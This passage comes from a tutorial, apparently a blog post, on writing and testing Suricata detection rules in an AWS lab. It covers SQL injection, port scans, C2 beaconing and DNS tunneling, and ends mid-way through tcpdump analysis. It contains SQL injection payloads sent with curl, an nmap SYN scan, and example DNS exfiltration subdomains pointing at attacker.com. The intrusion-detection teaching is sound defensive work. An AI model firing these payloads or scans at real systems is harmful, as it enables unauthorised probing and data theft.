fires every time the count is reached — so if nmap sends 50 SYN packets, you get approximately 10 alerts (one per 5 packets). Rule 4 uses <code>type both</code> which fires once then suppresses further alerts until the window resets — better for reducing alert fatigue on beaconing detection.</p> <ul> <li> <strong><code>sid:9000003</code></strong> — unique rule ID in the local custom range.</li> <li> <strong><code>rev:1</code></strong> — rule revision 1.</li> </ul> <p><strong>Example scenario it catches:</strong><br> A scanner like <code>nmap</code> sending SYN packets to ports 1 through 1000 in rapid succession from a single IP.</p> <p><strong>Fails against:</strong></p> <ul> <li> <strong>Slow scans</strong> — spreading 20 SYN packets over more than 10 seconds evades the threshold</li> <li> <strong>Distributed scans</strong> — multiple source IPs each sending fewer than 20 SYN packets</li> </ul> <h3> Rule 4: C2 Beaconing — HTTP Threshold </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert http <span class="nv">$HOME_NET</span> any -&gt; any any <span class="o">(</span>msg:<span class="s2">"Possible C2 Beaconing Detected"</span><span class="p">;</span> flow:to_server,established<span class="p">;</span> threshold:type both,track by_src,count 10,seconds 60<span class="p">;</span> sid:9000004<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p><strong>What is C2 Beaconing?</strong></p> <p>C2 stands for <strong>Command and Control</strong>. When an attacker successfully compromises a machine — through malware, a phishing link, or an exploit — they need a way to communicate with it remotely to issue commands, receive stolen data, and maintain access. The attacker runs a C2 server on the internet and the malware on the compromised machine calls home to it at regular intervals. This regular check-in is called <strong>beaconing</strong>.</p> <p>The malware typically uses HTTP or HTTPS to blend in with normal web traffic — from a firewall's perspective it looks like ordinary browser traffic. The beacon might say "I am here, any new commands?" and the C2 server responds with instructions: run this command, exfiltrate this file, move to this other machine.</p> <p>The telltale sign of beaconing is <strong>regularity</strong> — a compromised host making outbound HTTP requests on a precise, repeating schedule (every 30 seconds, every 5 minutes, etc.) to the same destination. Humans browse the web irregularly; malware beacons like a clock.</p> <p><strong>How it works:</strong></p> <ul> <li> <strong><code>alert</code></strong> — generate an alert without blocking.</li> <li> <strong><code>http</code></strong> — inspect HTTP traffic only. Most C2 frameworks use HTTP or HTTPS to blend in with normal web traffic.</li> <li> <strong><code>$HOME_NET any</code></strong> (source) — traffic originating from inside your subnet. C2 beaconing is outbound — a compromised host inside your network calling out to an attacker's server.</li> <li> <strong><code>-&gt;</code></strong> — traffic flowing outward from your network.</li> <li> <strong><code>any any</code></strong> (destination) — any external IP on any port.</li> <li> <strong><code>msg:"Possible C2 Beaconing Detected"</code></strong> — the alert label.</li> <li> <strong><code>flow:to_server,established</code></strong> — only inspect outbound HTTP requests on established connections, not raw SYN packets.</li> <li> <strong><code>threshold:type both,track by_src,count 10,seconds 60</code></strong> — alert when the same source IP makes 10 or more HTTP requests within 60 seconds, and then suppress further alerts until the window resets. <code>type both</code> means the rule triggers once per threshold window rather than once per packet, reducing alert fatigue. C2 beaconing is characterized by regular, periodic outbound connections — this pattern is what the rule is designed to catch.</li> <li> <strong><code>sid:9000004</code></strong> — unique rule ID in the local custom range.</li> <li> <strong><code>rev:1</code></strong> — rule revision 1.</li> </ul> <p><strong>Example scenario it catches:</strong><br> Malware beaconing to a C2 server every 5 seconds — 10 connections in under 60 seconds triggers the alert.</p> <p><strong>Fails against:</strong></p> <ul> <li> <strong>Slow beaconing</strong> — intervals longer than 6 seconds mean fewer than 10 connections per minute</li> <li> <strong>HTTPS C2</strong> — encrypted traffic is invisible without TLS inspection</li> <li> <strong>Domain fronting</strong> — C2 traffic disguised as requests to a legitimate CDN like Cloudflare</li> </ul> <h3> Rule 5: DNS Tunneling — Large DNS Query </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert udp any any -&gt; any 53 <span class="o">(</span>msg:<span class="s2">"Possible DNS Tunneling - Large Query"</span><span class="p">;</span> dsize:&gt;200<span class="p">;</span> sid:9000005<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p><strong>How it works:</strong></p> <ul> <li> <strong><code>alert</code></strong> — generate an alert without blocking.</li> <li> <strong><code>udp</code></strong> — inspect UDP traffic. DNS uses UDP port 53 by default for queries. Using <code>udp</code> instead of <code>dns</code> avoids mixing packet-level and application-layer keywords which Suricata 7 does not allow in the same rule.</li> <li> <strong><code>any any</code></strong> (source) — match DNS queries from any host.</li> <li> <strong><code>-&gt;</code></strong> — traffic direction outward.</li> <li> <strong><code>any 53</code></strong> (destination) — port 53 is the standard DNS port. Restricting to port 53 keeps this rule focused on DNS traffic specifically.</li> <li> <strong><code>msg:"Possible DNS Tunneling - Large Query"</code></strong> — the alert label.</li> <li> <strong><code>dsize:&gt;200</code></strong> — match only when the UDP payload is larger than 200 bytes. Normal DNS queries are small — a typical hostname lookup is under 50 bytes. DNS tunneling tools encode data as long subdomains like <code>dGhpcyBpcyBhIHRlc3Q=.evil.com</code> which produces abnormally large query sizes.</li> <li> <strong><code>sid:9000005</code></strong> — unique rule ID in the local custom range.</li> <li> <strong><code>rev:1</code></strong> — rule revision 1.</li> </ul> <p><strong>Example scenario it catches:</strong><br> A tool like <code>iodine</code> or <code>dnscat2</code> encoding exfiltrated data as base64 subdomains — <code>SGVsbG8gV29ybGQ=.attacker.com</code> — producing DNS queries well over 200 bytes.</p> <p><strong>Fails against:</strong></p> <ul> <li> <strong>Small payload encoding</strong> — splitting data into multiple short queries each under 200 bytes</li> <li> <strong>DNS over HTTPS (DoH)</strong> — DNS queries sent over HTTPS to resolvers like 8.8.8.8 are encrypted HTTP traffic, invisible to this rule</li> <li> <strong>Low and slow exfiltration</strong> — a few bytes per query over a long period of time</li> </ul> <h2> Part 5b: Loading the Rules into Suricata </h2> <p>Now that all 5 rules are written, here is how to load them and verify Suricata is enforcing them.</p> <h3> Step 1 — Paste the Rules into custom.rules </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nano /etc/suricata/rules/custom.rules </code></pre> </div> <p>Paste all rules — the two <code>pass</code> rules first, then the five alert rules:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pass http <span class="nv">$HOME_NET</span> any -&gt; 169.254.169.254 any <span class="o">(</span>msg:<span class="s2">"IMDS traffic - whitelist"</span><span class="p">;</span> sid:9000010<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> pass tcp <span class="nv">$HOME_NET</span> any -&gt; any 443 <span class="o">(</span>msg:<span class="s2">"AWS HTTPS services whitelist"</span><span class="p">;</span> sid:9000011<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> alert tcp any any -&gt; <span class="nv">$HOME_NET</span> any <span class="o">(</span>msg:<span class="s2">"SQL Injection UNION SELECT Attempt"</span><span class="p">;</span> content:<span class="s2">"UNION"</span><span class="p">;</span> nocase<span class="p">;</span> content:<span class="s2">"SELECT"</span><span class="p">;</span> nocase<span class="p">;</span> sid:9000001<span class="p">;</span> rev:4<span class="p">;</span><span class="o">)</span> alert tcp any any -&gt; <span class="nv">$HOME_NET</span> 80 <span class="o">(</span>msg:<span class="s2">"SQL Injection Comment Bypass Attempt"</span><span class="p">;</span> content:<span class="s2">"OR"</span><span class="p">;</span> nocase<span class="p">;</span> content:<span class="s2">"="</span><span class="p">;</span> nocase<span class="p">;</span> sid:9000002<span class="p">;</span> rev:6<span class="p">;</span><span class="o">)</span> alert tcp any any -&gt; <span class="nv">$HOME_NET</span> any <span class="o">(</span>msg:<span class="s2">"Possible Port Scan Detected"</span><span class="p">;</span> flags:S<span class="p">;</span> threshold:type threshold,track by_src,count 5,seconds 10<span class="p">;</span> sid:9000003<span class="p">;</span> rev:3<span class="p">;</span><span class="o">)</span> alert tcp <span class="nv">$HOME_NET</span> any -&gt; any any <span class="o">(</span>msg:<span class="s2">"Possible C2 Beaconing Detected"</span><span class="p">;</span> flow:to_server,established<span class="p">;</span> threshold:type both,track by_src,count 10,seconds 60<span class="p">;</span> sid:9000004<span class="p">;</span> rev:2<span class="p">;</span><span class="o">)</span> alert udp any any -&gt; any 53 <span class="o">(</span>msg:<span class="s2">"Possible DNS Tunneling - Large Query"</span><span class="p">;</span> dsize:&gt;200<span class="p">;</span> sid:9000005<span class="p">;</span> rev:2<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p>Save and exit: <code>Ctrl+X</code> → <code>Y</code> → <code>Enter</code></p> <h3> Step 1b — Remove suricata.rules from rule-files </h3> <p>By default <code>suricata.yaml</code> loads the full Emerging Threats community ruleset (<code>suricata.rules</code>) which contains ~40,000 rules. On a single-core t2.micro this causes two problems:</p> <ul> <li> <code>suricata -T</code> config tests take 4-6 minutes to complete</li> <li> <code>fast.log</code> is flooded with community ruleset alerts, drowning out your 5 custom rules</li> </ul> <p>For this lab remove <code>suricata.rules</code> so only your custom rules are loaded. Open <code>suricata.yaml</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>nano /etc/suricata/suricata.yaml </code></pre> </div> <p>Find the <code>rule-files:</code> section — it looks like this by default:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">rule-files</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">suricata.rules</span> </code></pre> </div> <p>Change it to:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">rule-files</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">/etc/suricata/rules/custom.rules</span> </code></pre> </div> <p>Save and exit: <code>Ctrl+X</code> → <code>Y</code> → <code>Enter</code></p> <blockquote> <p><strong>Note:</strong> This is a lab-only decision. In a production environment you would keep <code>suricata.rules</code> for broad threat coverage and add <code>custom.rules</code> alongside it. Exercise 5 at the end of this post walks you through adding the ET ruleset back deliberately once you understand how your custom rules behave in isolation.</p> </blockquote> <h3> Step 2 — Validate the Config </h3> <p>Always run the config test before restarting — a syntax error in <code>custom.rules</code> will prevent Suricata from starting.</p> <blockquote> <p>⚠️ All Suricata commands must be run as root. If your prompt shows <code>ssm-user@</code> you have dropped out of the root shell. Run <code>sudo -i</code> to get back in before continuing.<br> </p> </blockquote> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo</span> <span class="nt">-i</span> suricata <span class="nt">-T</span> <span class="nt">-c</span> /etc/suricata/suricata.yaml <span class="nt">-v</span> </code></pre> </div> <p>Look for:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Notice: suricata: Configuration provided was successfully loaded. Exiting. </code></pre> </div> <p>If instead you see:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Error: suricata: The logging directory "/var/log/suricata/" is not writable. Shutting down the engine </code></pre> </div> <p>This means you are not running as root. Run <code>sudo -i</code> and try again.</p> <p>If you see an error referencing a <code>sid</code> number, that rule has a syntax problem — check it carefully for missing semicolons or mismatched quotes.</p> <h3> Step 3 — Reload Suricata </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>systemctl restart suricata systemctl status suricata </code></pre> </div> <p>Confirm it is active and running — not in a failed state.</p> <h3> Step 4 — Confirm Rules Are Loaded </h3> <p>After restarting, verify Suricata loaded only your 6 custom rules (5 alert rules + 1 pass rule):<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo grep</span> <span class="s2">"rules loaded</span><span class="se">\|</span><span class="s2">signatures processed"</span> /var/log/suricata/suricata.log | <span class="nb">tail</span> <span class="nt">-3</span> </code></pre> </div> <p>Expected output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Info: detect: 6 signatures processed. 0 are IP-only rules, 2 are inspecting packet payload, 2 inspect application layer, 0 are decoder event only </code></pre> </div> <p><code>6 signatures processed</code> confirms only your custom rules are loaded. If you see a much larger number restart Suricata and check again:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>systemctl restart suricata <span class="nb">sudo grep</span> <span class="s2">"signatures processed"</span> /var/log/suricata/suricata.log | <span class="nb">tail</span> <span class="nt">-1</span> </code></pre> </div> <blockquote> <p><strong>Note on eve.json stats:</strong> The <code>eve.json</code> file contains periodic stats entries that may show large <code>rules_loaded</code> numbers from previous Suricata sessions. Always use <code>suricata.log</code> to confirm the current session's rule count — it is more reliable than <code>eve.json</code> for this purpose.</p> </blockquote> <p>Also verify <code>suricata.yaml</code> only loads your custom rules:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo grep</span> <span class="nt">-A5</span> <span class="s2">"rule-files:"</span> /etc/suricata/suricata.yaml </code></pre> </div> <p>It should show only:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">rule-files</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">/etc/suricata/rules/custom.rules</span> </code></pre> </div> <p>Also check the <code>last_reload</code> timestamp in <code>eve.json</code> stats events — it must be more recent than your last <code>systemctl restart</code> to confirm the new config is active:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo tail</span> <span class="nt">-1</span> /var/log/suricata/eve.json | python3 <span class="nt">-c</span> <span class="s2">"import sys,json; d=json.loads(sys.stdin.read()); print(d['stats']['detect']['engines'][0]['last_reload'])"</span> </code></pre> </div> <h3> Step 5 — Watch the Alert Log in Real Time </h3> <p>Open a second terminal and tail <code>fast.log</code> — this is where Suricata writes one line per alert:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">tail</span> <span class="nt">-f</span> /var/log/suricata/fast.log </code></pre> </div> <p>Leave this running while you trigger test traffic in Part 6. Every alert will appear here in real time as it fires.</p> <p>For richer detail including the full packet metadata, tail <code>eve.json</code> instead:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">tail</span> <span class="nt">-f</span> /var/log/suricata/eve.json | python3 <span class="nt">-m</span> json.tool </code></pre> </div> <p><code>eve.json</code> is newline-delimited JSON — piping through <code>python3 -m json.tool</code> pretty-prints each event so it is readable.</p> <h2> Part 6: Test the Rules </h2> <h3> Setup — Two Terminals </h3> <p>Testing requires watching alerts fire in real time while generating test traffic. Open two terminal sessions connected to the instance via <code>lab-connect</code>.</p> <p><strong>Terminal 1 — watch for alerts:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo tail</span> <span class="nt">-f</span> /var/log/suricata/fast.log </code></pre> </div> <p>Leave this running. Every alert Suricata generates will appear here immediately.</p> <blockquote> <p><strong>Tip — Clear the log before testing:</strong> If <code>fast.log</code> already has entries from previous sessions, clear it first so you only see alerts from your test traffic. Use <code>truncate</code> rather than <code>rm</code> — Suricata keeps the file handle open and deleting it would stop logging:</p> <pre class="highlight shell"><code><span class="nb">sudo truncate</span> <span class="nt">-s</span> 0 /var/log/suricata/fast.log </code></pre> </blockquote> <p><strong>Terminal 2 — generate test traffic</strong> (commands below).</p> <h3> Understanding fast.log Output </h3> <p>Each alert line in <code>fast.log</code> follows this format:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>TIMESTAMP [**] [GID:SID:REV] MESSAGE [**] [Classification] [Priority] {PROTO} SRC_IP:PORT -&gt; DST_IP:PORT </code></pre> </div> <p>For example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>03/18/2026-18:22:58.822948 [**] [1:9000004:1] Possible C2 Beaconing Detected [**] [Classification: (null)] [Priority: 3] {TCP} 172.31.23.15:43900 -&gt; 169.254.169.254:80 </code></pre> </div> <p>Breaking this down:</p> <ul> <li> <code>03/18/2026-18:22:58</code> — timestamp</li> <li> <code>[1:9000004:1]</code> — GID 1, SID 9000004 (your Rule 4), revision 1</li> <li> <code>Possible C2 Beaconing Detected</code> — the <code>msg</code> field from the rule</li> <li> <code>{TCP}</code> — protocol</li> <li> <code>172.31.23.15:43900 -&gt; 169.254.169.254:80</code> — source IP:port → destination IP:port</li> </ul> <h3> Rule 4 Already Firing — A Real False Positive </h3> <p>Before even running any test traffic, Rule 4 fires immediately after Suricata starts:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>03/18/2026-18:22:58.822948 [**] [1:9000004:1] Possible C2 Beaconing Detected [**] [Classification: (null)] [Priority: 3] {TCP} 172.31.23.15:43900 -&gt; 169.254.169.254:80 03/18/2026-21:27:58.844144 [**] [1:9000004:2] Possible C2 Beaconing Detected [**] [Classification: (null)] [Priority: 3] {TCP} 172.31.23.15:44068 -&gt; xx.xxx.xx.xxx:443 03/18/2026-21:29:35.909465 [**] [1:9000004:2] Possible C2 Beaconing Detected [**] [Classification: (null)] [Priority: 3] {TCP} 172.31.23.15:34952 -&gt; xx.xxx.xx.xxx:443 </code></pre> </div> <p>Firing every few minutes to multiple AWS endpoints — <code>169.254.169.254:80</code>, <code>xx.xxx.xx.xxx:443</code>, <code>xx.xxx.xx.xxx:443</code>, and others on port 443.</p> <p><strong>This is a false positive.</strong> Two things are happening:</p> <ul> <li> <code>169.254.169.254</code> is the <strong>AWS EC2 Instance Metadata Service (IMDS)</strong> — every EC2 instance contacts it regularly over HTTP to retrieve metadata and IAM credentials</li> <li>The other IPs (<code>xx.xxx.xx.xxx</code>, <code>xx.xxx.xx.xxx</code>, etc.) are <strong>AWS SSM and CloudWatch endpoints</strong> — the SSM Agent and other AWS services make regular HTTPS calls to these on port 443</li> </ul> <p>From Suricata's perspective all of these look identical to C2 beaconing. This is a perfect real-world example of why <strong>whitelisting matters in production IDS work</strong>.</p> <p>The fix is two <code>pass</code> rules — one for IMDS (HTTP) and one for all outbound HTTPS to AWS services. <strong>Both must be placed at the very top of <code>custom.rules</code> — before all alert rules.</strong> Suricata processes rules in order from top to bottom. If Rule 4 matches first it fires before ever reaching the <code>pass</code> rules.</p> <p>Your final <code>custom.rules</code> file should look exactly like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pass http <span class="nv">$HOME_NET</span> any -&gt; 169.254.169.254 any <span class="o">(</span>msg:<span class="s2">"IMDS traffic - whitelist"</span><span class="p">;</span> sid:9000010<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> pass tcp <span class="nv">$HOME_NET</span> any -&gt; any 443 <span class="o">(</span>msg:<span class="s2">"AWS HTTPS services whitelist"</span><span class="p">;</span> sid:9000011<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> alert tcp any any -&gt; <span class="nv">$HOME_NET</span> any <span class="o">(</span>msg:<span class="s2">"SQL Injection UNION SELECT Attempt"</span><span class="p">;</span> content:<span class="s2">"UNION"</span><span class="p">;</span> nocase<span class="p">;</span> content:<span class="s2">"SELECT"</span><span class="p">;</span> nocase<span class="p">;</span> sid:9000001<span class="p">;</span> rev:4<span class="p">;</span><span class="o">)</span> alert tcp any any -&gt; <span class="nv">$HOME_NET</span> 80 <span class="o">(</span>msg:<span class="s2">"SQL Injection Comment Bypass Attempt"</span><span class="p">;</span> content:<span class="s2">"OR"</span><span class="p">;</span> nocase<span class="p">;</span> content:<span class="s2">"="</span><span class="p">;</span> nocase<span class="p">;</span> sid:9000002<span class="p">;</span> rev:6<span class="p">;</span><span class="o">)</span> alert tcp any any -&gt; <span class="nv">$HOME_NET</span> any <span class="o">(</span>msg:<span class="s2">"Possible Port Scan Detected"</span><span class="p">;</span> flags:S<span class="p">;</span> threshold:type threshold,track by_src,count 5,seconds 10<span class="p">;</span> sid:9000003<span class="p">;</span> rev:3<span class="p">;</span><span class="o">)</span> alert tcp <span class="nv">$HOME_NET</span> any -&gt; any any <span class="o">(</span>msg:<span class="s2">"Possible C2 Beaconing Detected"</span><span class="p">;</span> flow:to_server,established<span class="p">;</span> threshold:type both,track by_src,count 10,seconds 60<span class="p">;</span> sid:9000004<span class="p">;</span> rev:2<span class="p">;</span><span class="o">)</span> alert udp any any -&gt; any 53 <span class="o">(</span>msg:<span class="s2">"Possible DNS Tunneling - Large Query"</span><span class="p">;</span> dsize:&gt;200<span class="p">;</span> sid:9000005<span class="p">;</span> rev:2<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p>After saving, validate and restart:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>suricata <span class="nt">-T</span> <span class="nt">-c</span> /etc/suricata/suricata.yaml <span class="nt">-v</span> <span class="nb">sudo </span>systemctl restart suricata <span class="nb">sudo truncate</span> <span class="nt">-s</span> 0 /var/log/suricata/fast.log </code></pre> </div> <blockquote> <p><strong>Confirming the fix works:</strong> After restarting, <code>fast.log</code> should be empty — no more C2 beaconing noise from AWS services. When you run the test curl commands below, only your genuine attack payloads should appear.</p> </blockquote> <h3> Test Rule 1 — SQL Injection UNION SELECT </h3> <p>In Terminal 2, clear the log first then send a curl request with a UNION SELECT payload:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo truncate</span> <span class="nt">-s</span> 0 /var/log/suricata/fast.log curl <span class="nt">-v</span> <span class="nt">-G</span> <span class="s2">"http://172.31.23.15/"</span> <span class="nt">--data-urlencode</span> <span class="s2">"id=1' UNION SELECT username,password FROM users--"</span> <span class="nb">sudo cat</span> /var/log/suricata/fast.log </code></pre> </div> <blockquote> <p><strong>If <code>fast.log</code> is empty:</strong> Check that <code>lo</code> is listed in the <code>af-packet</code> section of <code>suricata.yaml</code> alongside <code>enX0</code>. Traffic from <code>curl</code> on the same instance routes through <code>lo</code>, not <code>enX0</code>. Without <code>lo</code> in the config Suricata never sees the request. After adding it restart Suricata before retesting.</p> </blockquote> <p>Expected alert:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>03/18/2026-20:37:50.935403 [**] [1:9000001:4] SQL Injection UNION SELECT Attempt [**] [Classification: (null)] [Priority: 3] {TCP} 172.31.23.15:32850 -&gt; 172.31.23.15:80 </code></pre> </div> <h3> Test Rule 2 — SQL Injection Comment Bypass </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo truncate</span> <span class="nt">-s</span> 0 /var/log/suricata/fast.log curl <span class="nt">-v</span> <span class="s2">"http://172.31.23.15/?id=1%27%20OR%201%3D1--"</span> <span class="nb">sudo cat</span> /var/log/suricata/fast.log </code></pre> </div> <p>Expected alert:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>03/18/2026-21:24:54.092935 [**] [1:9000002:6] SQL Injection Comment Bypass Attempt [**] [Classification: (null)] [Priority: 3] {TCP} 172.31.23.15:36692 -&gt; 172.31.23.15:80 </code></pre> </div> <h3> Test Rule 3 — Port Scan </h3> <p>Use <code>nmap</code> to send a burst of SYN packets. Three important requirements:</p> <ul> <li>Use <code>sudo</code> — a SYN scan (<code>-sS</code>) requires raw socket privileges</li> <li>Scan the instance's <strong>real IP</strong> (<code>172.31.23.15</code>) not <code>127.0.0.1</code> — the destination must fall within <code>$HOME_NET</code> for the rule to match</li> <li>Use <code>--max-rate 10</code> to limit nmap to 10 packets per second — if nmap fires too fast Suricata cannot track the threshold on a single-core t2.micro and no alert fires </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>apt-get <span class="nb">install </span>nmap <span class="nt">-y</span> <span class="nb">sudo truncate</span> <span class="nt">-s</span> 0 /var/log/suricata/fast.log <span class="nb">sudo </span>nmap <span class="nt">-sS</span> <span class="nt">--max-rate</span> 10 172.31.23.15 <span class="nb">sudo cat</span> /var/log/suricata/fast.log </code></pre> </div> <p>Expected output — one alert per port probed, showing the scan working through many different destination ports from the same source IP:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>03/18/2026-22:07:29.315182 [**] [1:9000003:3] Possible Port Scan Detected [**] [Classification: (null)] [Priority: 3] {TCP} 172.31.23.15:36871 -&gt; 172.31.23.15:1720 03/18/2026-22:07:29.815169 [**] [1:9000003:3] Possible Port Scan Detected [**] [Classification: (null)] [Priority: 3] {TCP} 172.31.23.15:36871 -&gt; 172.31.23.15:139 03/18/2026-22:07:30.315156 [**] [1:9000003:3] Possible Port Scan Detected [**] [Classification: (null)] [Priority: 3] {TCP} 172.31.23.15:36871 -&gt; 172.31.23.15:587 ... </code></pre> </div> <p>Notice the same source port (<code>36871</code>) hitting many different destination ports — that is the signature of a port scan. The threshold of 5 SYN packets in 10 seconds fires once the scan hits 5 ports, then continues firing as the scan progresses.</p> <h3> Test Rule 5 — DNS Tunneling </h3> <p>Use <code>dig</code> to send a large DNS query. Each DNS label (the part between dots) has a maximum length of 63 characters — split the payload across multiple labels to stay within the limit while exceeding 200 bytes total:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>apt-get <span class="nb">install </span>dnsutils <span class="nt">-y</span> <span class="nb">sudo truncate</span> <span class="nt">-s</span> 0 /var/log/suricata/fast.log dig <span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*60 + '.' + 'B'*60 + '.' + 'C'*60)"</span><span class="si">)</span>.google.com @8.8.8.8 <span class="nb">sudo cat</span> /var/log/suricata/fast.log </code></pre> </div> <p>This creates a domain with three 60-character labels — <code>AAAA...60.BBBB...60.CCCC...60.google.com</code> — well over 200 bytes total while staying within the 63-character per-label DNS limit.</p> <blockquote> <p><strong>Why not one long string?</strong> DNS labels are limited to 63 characters each. <code>'A'*180 + '.google.com'</code> produces <code>label too long</code> error. Splitting across three labels of 60 characters each produces the same large payload while being a valid DNS name.</p> </blockquote> <p>Expected alert:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>03/18/2026-22:28:42.595604 [**] [1:9000005:2] Possible DNS Tunneling - Large Query [**] [Classification: (null)] [Priority: 3] {UDP} 172.31.23.15:60507 -&gt; 8.8.8.8:53 </code></pre> </div> <p>Notice the protocol is <code>{UDP}</code> and the destination is <code>8.8.8.8:53</code> — confirming Suricata caught the large DNS query going out to Google's public resolver.</p> <h2> Part 7: PCAP Analysis </h2> <p>As SAED — a Security Engineer at Google — notes: whether it is Wireshark or tcpdump, the core function is analysing network traffic for threats. This section uses <code>tcpdump</code> directly on the instance to capture and examine the same attack traffic that triggered the Suricata rules in Part 6.</p> <h3> Capture Traffic to a PCAP File </h3> <p>Run <code>tcpdump</code> while generating attack traffic in a second terminal. The <code>-w</code> flag writes raw packets to a file for later analysis:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>tcpdump <span class="nt">-i</span> lo <span class="nt">-w</span> /tmp/lab_capture.pcap &amp; </code></pre> </div> <p>The <code>&amp;</code> runs it in the background. Now generate all the test traffic:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-v</span> <span class="nt">-G</span> <span class="s2">"http://172.31.23.15/"</span> <span class="nt">--data-urlencode</span> <span class="s2">"id=1' UNION SELECT username,password FROM users--"</span> curl <span class="nt">-v</span> <span class="s2">"http://172.31.23.15/?id=1%27%20OR%201%3D1--"</span> <span class="nb">sudo </span>nmap <span class="nt">-sS</span> <span class="nt">--max-rate</span> 10 172.31.23.15 <span class="nt">-p</span> 1-100 dig <span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*60 + '.' + 'B'*60 + '.' + 'C'*60)"</span><span class="si">)</span>.google.com @8.8.8.8 </code></pre> </div> <p>Stop the capture:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>pkill tcpdump </code></pre> </div> <h3> Analyse the PCAP with tcpdump Filters </h3> <p><strong>View all captured packets (summary):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>tcpdump <span class="nt">-r</span> /tmp/lab_capture.pcap </code></pre> </div> <p><strong>Filter 1 — SQL Injection traffic (HTTP on port 80):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>tcpdump <span class="nt">-r</span> /tmp/lab_capture.pcap <span class="nt">-A</span> <span class="s1">'tcp port 80'</span> | <span class="nb">grep</span> <span class="nt">-i</span> <span class="s2">"UNION</span><span class="se">\|</span><span class="s2">SELECT</span><span class="se">\|</span><span class="s2">OR"</span> </code></pre> </div> <p>The <code>-A</code> flag prints packet contents in ASCII. Real output from this lab:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>01:25:37.636597 IP ip-172-31-26-99.56868 &gt; ip-172-31-26-99.http: Flags [P.], length 130: HTTP: GET /?id=1%27+UNION+SELECT+username%2cpassword+FROM+users-- HTTP/1.1 GET /?id=1%27+UNION+SELECT+username%2cpassword+FROM+users-- HTTP/1.1 01:28:04.908873 IP ip-172-31-26-99.48712 &gt; ip-172-31-26-99.http: Flags [P.], length 99: HTTP: GET /?id=1%27%20OR%201%3D1-- HTTP/1.1 GET /?id=1%27%20OR%201%3D1-- HTTP/1.1 </code></pre> </div> <p><code>Flags [P.]</code> is the PSH+ACK flag — this is a data-carrying packet containing the HTTP request payload, not a handshake packet. The full SQL injection strings are readable in plaintext directly from the packet bytes — exactly what Suricata's <code>content</code> matching inspects.</p> <p><strong>Filter 2 — Port Scan (SYN packets only):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>tcpdump <span class="nt">-r</span> /tmp/lab_capture.pcap <span class="s1">'tcp[tcpflags] == tcp-syn'</span> </code></pre> </div> <p><code>tcp[tcpflags] == tcp-syn</code> is a Berkeley Packet Filter (BPF) expression matching only SYN-flagged packets — the same condition as <code>flags:S</code> in the Suricata rule. Real output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>01:28:36.551927 IP ip-172-31-26-99.58404 &gt; ip-172-31-26-99.smtp: Flags [S] 01:28:36.641851 IP ip-172-31-26-99.58404 &gt; ip-172-31-26-99.http: Flags [S] 01:28:36.741904 